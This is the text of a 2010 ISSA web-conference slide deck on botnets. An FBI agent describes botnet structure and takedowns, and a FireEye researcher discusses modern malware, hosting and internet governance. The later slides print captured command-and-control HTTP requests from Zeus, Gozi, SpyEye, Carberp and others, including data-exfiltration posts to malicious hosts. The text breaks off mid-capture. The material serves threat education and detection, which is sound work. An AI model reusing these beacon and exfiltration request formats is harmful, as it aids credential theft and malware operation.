Botnets Sponsored by: ISSA Web Conference October 26, 2010 Start Time: 9 am US Pacific, Noon US Eastern, 5 pm London 1 Welcome: Conference Moderator Phillip H Griffin Member - ISSA Educational Advisory Council, Web Conferences Committee 2 Agenda • How Botnets Have Evolved – Chris Calderon - Special Agent, FBI • Rooting Out the Bad Actors – Alex Lanstein - Systems Consulting Engineer, FireEye • Joint Speaker Question & Answer • Closing Comments 3 UNCLASSIFIED How Botnets Have Evolved presented by Special Agent Chris Calderon FBI UNCLASSIFIED UNCLASSIFIED Agenda • What is a botnet? • How are botnets created? • Why are botnets created? • Basic structure of a botnet • Taking down a botnet • How botnets are evolving • Botnets in the news • Questions UNCLASSIFIED UNCLASSIFIED What is a botnet? • A network of compromised computers (robots/bots) • Controlled by a bot master / herder • Used to carry out various illegal activities • Services are often sold to other criminal elements UNCLASSIFIED UNCLASSIFIED How are botnets created? • Obtain reliable infrastructure Setup • Develop malware and C&C software • Malware loaded onto victim machines Victims • Done through exploits and/or social engineering • Continually update software / instructions to bots Manage • Maintain statistics for the botnet UNCLASSIFIED UNCLASSIFIED Why are botnets created? • Spam • Distributed Denial of Service (DDoS) • Click Fraud • Fake Anti-Virus • Credential Theft • Proxy Service • Cyber Warfare UNCLASSIFIED UNCLASSIFIED Basic Structure Victim C&C Server Bot Master / Victim Herder C&C Victim Server UNCLASSIFIED UNCLASSIFIED Taking down a botnet Victim C&C Server Bot Master / Victim Herder C&C Victim Server UNCLASSIFIED UNCLASSIFIED Botnets evolving Proxy Victim C&C Server Victim Proxy Bot Master / Herder Victim C&C Proxy Victim Server UNCLASSIFIED UNCLASSIFIED Botnets evolving Proxy Victim C&C Proxy Server Victim Proxy Bot Master / Herder Victim C&C Proxy Proxy Victim Server UNCLASSIFIED UNCLASSIFIED Botnets in the news • ZEUS – Steels and logs online banking credentials – Primarily targets high balance accounts – Money “mules” used to get money to bad actors – Kit now used by many different groups – Estimated $70,000,000 stolen from US banks UNCLASSIFIED UNCLASSIFIED Botnets in the news • MARIPOSA (BUTTERFLY) – Steels online credentials, and also used in DDoS attacks – Estimated 12 million infected computers – Bad actors traced to Spain and arrested – Criminal proceedings ongoing UNCLASSIFIED UNCLASSIFIED Botnets in the news • SPAM BOTS – Conficker, Cutwail, Waledac, …. – Up to 10 million bots per botnet – Each botnet can send billions of spam emails per day – Spam used to distribute malware, drive online pharmaceutical sales, fake antivirus software, pay per click advertising, …. UNCLASSIFIED UNCLASSIFIED Questions? UNCLASSIFIED Rooting out the Bad Actors or: p2p, fast flux, and other botnet myths Alex Lanstein Senior Security Researcher FireEye, Inc. Today’s Agenda • Understanding the shift from conventional to modern malware, and the resultant hosting needs • A few TT&P to uncover older or moderately sophisticated malware • A detailed looked a few bots “in the news” 2 18 Conventional vs. Modern, APT Malware Conventional Malware • Characterized by using “spreading” techniques, custom C&C transport protocols, IRC communication – Examples: Malware/worms such as Conficker, Blaster, Slammer, Mega-D, IRC bots • Detectable through a variety of technologies/tactics: – NetWitness/Solera, EnVision/Arcsight/Splunk, NIDS – Port scanning, high windows port activity, non-http over port 80, non-web traffic, etc. 3 19 Conventional vs. Modern Malware Modern-ish malware: – Characterized by infecting via browser based exploits – Exploit Channel: PDF, Flash, IE/FireFox, QuickTime, C&C Callback over HTTP(s) – Malware: ZeuS, Gozi, Koobface, Rustock, Spyeye – Partially detectable through manual traffic analysis fairly easily, but a full time resource is needed 4 20 World’s Top Malware Source: FireEye Malware Intelligence Lab 21 21 Modern Malware Infection Lifecycle 1 System gets exploited . Drive-by attacks in casual browsing . Links in Targeted Emails Compromised . Socially engineered binaries Web server, or Callback Server Web 2.0 site 2 Dropper malware installs . First step to establish control . Calls back out to criminal servers Perimeter Security Signature, rule-based . Found on compromised sites, and Web 2.0, user-created content sites Other gateway 3 Malicious data theft & long- List-based, signatures term control established . Uploads data stolen via keyloggers, Trojans, bots, & file grabbers . One exploit leads to dozens of infections on same system . Criminals have built long-term control mechanisms into system Desktop antivirus Losing the threat arms race 22 22 Where is all this malware being hosted? • Previously we used to see malware being hosted on infected home machines • Web filters responded by blocking access to domains that had multiple A records in residential IP space • Now it’s being hosted on dedicated servers in proper data centers. Sometimes even with their own RIR registered IP space! 23 Root of the Problem • There is no “Internet Police”! • Who controls the Internet? ICANN? IANA? CERTs? USCYBERCOM? Tier 1 ISPs? • Depends who you ask and how big a stink you make. 24 How the Internet is delegated In the name space (think DNS): • ICANN Registries • Registries == Verisign, Affilias, ccTLD operators • Registries sell to certified gTLD and regional registrars • Registrars == namecheap.com, godaddy.com, netsol.com • Registrars sell to registrants (end user) 25 How the Internet is delegated In the IP space: • ICANN/IANA (Internet Assigned Numbers Authority) • IANA RIRs • RIRs == ARIN, LACNIC, AFRINIC, APNIC, RIPE-NCC • RIRs LIRs • LIRs are generally data centers and ISPs 26 27 28 29 ICANN’t do anything! • ICANN and the RIRs simply sign contracts. They have no regulatory authority whatsoever, presuming that the Registrar doesn’t violate the contract. These contracts have no mention of “content”. • Recent success against EstDomains was due to them having a convicted felon as an Officer of the company. • Large pushback when someone even suspects they are trying to take an authoritative stance on something. 30 31 32 Big bots in 2010 Rustock – still sticking around POST /index.php?topic=33.117 HTTP/1.1 Accept: */* Accept-Language: en-us Referer: http://go-thailand-now.com/ Content-Type: application/x-www-form-urlencoded Content-Encoding: gzip UA-CPU: x86 Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1) Host: go-thailand-now.com Content-Length: 214 Connection: Keep-Alive Cache-Control: no-cache 18 34 Gozi POST /cgi-bin/forms.cgi HTTP/1.0 Content-Type: multipart/form-data; boundary=-------------------------- 139b9b3139b9b3139b9b3 User-Agent: IE Host: 91.216.215.130 Content-Length: 453 Pragma: no-cache ----------------------------139b9b3139b9b3139b9b3 Content-Disposition: form-data; name="upload_file"; filename="3759777034.21" Content-Type: application/octet-stream URL: https://mail.google.com/mail/channel/bind?VER=8&at=KLJASDF133234901 FhI &it=1121&SID=6JK1290NR3A3&RID=4611&AID=95&= mousemove ----------------------------139b9b3139b9b3139b9b3-- 19 35 Zeus POST /xed/gate.php HTTP/1.1 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; HPNTDF) Host: schastlivieiveselierebyta0001.com Content-Length: 329 Connection: Keep-Alive Cache-Control: no-cache . ....4...A..2.`.Ul...T.......(....4pP.u.x.!.D.!.+.......q.. '7.........7.....D.0..Y...$.......[(...F...c.|e.y...g.b..t.x.......- [email protected]>.s..j=. ..rY?.-8.c Ss.Gt'.a. ...cU./. .e(....QB.D.S..N0>.5.....I.`:........".....;5..U. .t....!......f.=E.<?S..J..J...&.U4...Ju.'9F..E..A.{../.X.cY.}..9..?_...$#>....0Y,.. ..".<. 20 36 Tigger – Not just financials anymore POST /track_c.cgi HTTP/1.0 Content-Length: 81 icin.wembh.rjr...{|.JST]....wSJAUQFN.mST^AJS.bj.i_HUUY_.j[YQ. .J.J.. ...L . SANDBOX_QEZA1290412412;append;20;Microsoft Windows XP Service Pack 3;post_log;16639;force;[[[URL: https://internal.fireeye.com/login Title: <untitled> Process: C:\Program Files\Internet Explorer\iexplore.exe User-agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; FunWebProducts; .NET CLR 3.0.04506.30; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)]]] {{{_b=sandbox&_k=mypass55%23&_r=0&timezone=420&timezoneFeb=420&timez oneOct=4 20&clientTime=removed&awr=1&isLoginForm=1&awsnf=_5&awsn=_u&awfid=true &aw charset=UTF-8&KEYLOG=s}}} 21 37 SpyEye – ZeuS replacement? GET /web/map/gate.php?guid=users1!AJKLPQ!JU1232 &ver=10280&stat=ONLINE&plg=ftpbc;socks5;t2p&cpu=0&ccrc=JKL AF24&md5=9012ab902413dcf8gga89 HTTP/1.0 User-Agent: Microsoft Internet Explorer Host: hahsdhsl.com Pragma: no-cache GET /maincp/gate.php?guid=user2!ND93103!893CND1 &ver=10280&stat=ONLINE&cpu=0&ccrc=A91024N&md5=3fabd889 712214bdbee8381337 HTTP/1.0 User-Agent: Microsoft Internet Explorer Host: www.promohru.in Pragma: no-cache 22 38 Carberp – Yet Another Datastealer POST /recv.php HTTP/1.1 Host: 194.54.80.146 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en- US; rv:1.9.2.10) Gecko/20100914 Firefox/3.6.10 Accept: text/html Connection: Close Content-Type: application/x-www-form-urlencoded Content-Length: 331 uid=MYWITCH099ABE891209141FGA91AFD&brw=2&type=1 &data=https%3A%2F%2Fwww%2Estarwoodhotels%2Ecom% 2Fpreferredguest%2Faccount%2Fsign%5Fin%2Ehtml%3F%7